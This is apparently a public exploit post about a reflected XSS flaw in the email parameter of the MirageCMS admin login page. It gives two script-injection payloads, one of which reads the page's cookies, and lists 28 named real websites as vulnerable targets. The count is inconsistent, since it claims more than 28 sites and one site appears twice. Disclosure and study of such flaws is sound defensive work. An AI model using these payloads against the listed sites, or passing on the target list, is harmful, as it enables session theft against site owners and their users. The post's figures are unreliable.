Overview - All the versions of MirageCMS are vulnerable to a reflected XSS, The attacker can inject JavaScript to email parameter in a login page. More than 28 websites are vulnerable.
POC - www.miragecms.com/admin/login
"><script>alert(1);</script>
"><script>alert(document.cookie);</script>
all the vulnerable websites:
1. http://www.stgweb.com
2. http://www.perot4u.co.il
3. http://www.svsystems.co.il
4. http://www.mertens-hoffman.co.il
5. http://www.discreet-f.co.il
6. http://www.justeyefashion.com
7. http://www.daniel-matat.co.il
8. http://www.the-d.co.il
9. https://www.kozicorporatehousing.com
10. http://www.control-towers.com
11. http://www.tikrot.co.il
12. http://www.talimbar.com
13. http://www.polyron.co.il
14. http://www.hezidean.co.il
15. http://www.udishor.com
16. http://www.mayevsky.co.il
17. http://www.veksler.co.il
18. http://www.egm.co.il
19. http://www.etgar-siud.com
20. http://www.tel-raz.co.il
21. http://www.nuritbublil.co.il
22. http://www.3access.net
23. http://www.etgar-hr.com
24. http://www.teritory.co.il
25. http://www.teritory.co.il
26. http://www.ybendror.com
27. http://www.woops.co.il
28. http://www.portcafe.co.il
